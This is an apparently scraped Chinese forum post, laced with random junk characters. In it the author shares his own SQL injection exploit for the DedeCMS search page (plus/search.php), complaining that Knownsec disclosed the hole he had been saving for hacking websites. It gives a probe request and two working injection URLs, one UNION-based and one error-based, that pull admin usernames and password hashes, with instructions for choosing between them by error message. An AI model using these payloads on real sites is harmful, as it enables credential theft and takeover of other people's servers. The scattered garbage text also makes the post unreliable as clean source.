转载不加作者名的没JJ' [4 g; N8 P+ U& U% j
" M" ?! q' g6 l0 G哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。7 X/ b% }" Y6 |3 H4 s9 n
^4 X2 A4 G& t3 K' e! E3 R" e既然已经发出来了,我就把我自己搞的exp发下吧。。唉。" S% g/ v' F0 q- B9 f$ g0 p
~9 B# w3 M1 O我一般是这样测试的:
8 L/ ~/ k5 |/ Q2 ?8 _+ g+ Y) a2 M
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
0 y5 [ H! u, D: U
6 \8 P9 j- y3 f' D, k转载不加作者名的没JJ
- V0 h0 Y6 z4 ]1 \6 d0 a
: r! `- M# p3 F$ `$ H% z8 f+ z作者:鬼哥- W$ [; C2 Y" M# y6 h: e3 z8 S
2 N) r5 r8 v$ `4 w1 ^
9 C' @* M- B4 `" P1 K. T, Z
" o0 s) {) S3 ~ \) y
看结果如果提示1 _9 [, K( G0 d# T1 _* W$ I( H
; L+ X9 o9 f) A# ?( ?' x; T/ j2 y# ASafe Alert: Request Error step 2 !& P( M) h3 g' s* Q) l
M! P' G$ o9 s! B/ k4 O4 z那么直接用下面的exp
+ C% g8 g" i4 X
$ Q- Y; _! V e) J" H' r7 f" x! }xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a7 O) `7 r. X! x% T/ x
6 p9 q# Z: K$ a+ d
" }# }, f1 U" @4 i( s# Z看结果如果提示
" ^, x f, C5 v" A. k5 P# f, b# X/ R# W- c" A2 V! T
Safe Alert: Request Error step 1 !: ~, L* ~& L9 H7 d8 V( k0 S
. H+ ~% ~# d3 f
那么直接用下面的exp; @8 v! [3 j& r7 H7 R
1 D& @6 q8 O9 G+ O& j8 |
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a1 S. W9 T' v% p. q* w
, o0 j- I& p9 W% ]6 l$ z& k( D7 |2 [. r
如果正常显示证明漏洞不存在了。; I$ x) t, y' l! b/ l9 ^6 e
- X5 b: u1 J. C$ m( o, \ L4 y3 r/ c
转载不加作者名的没JJ |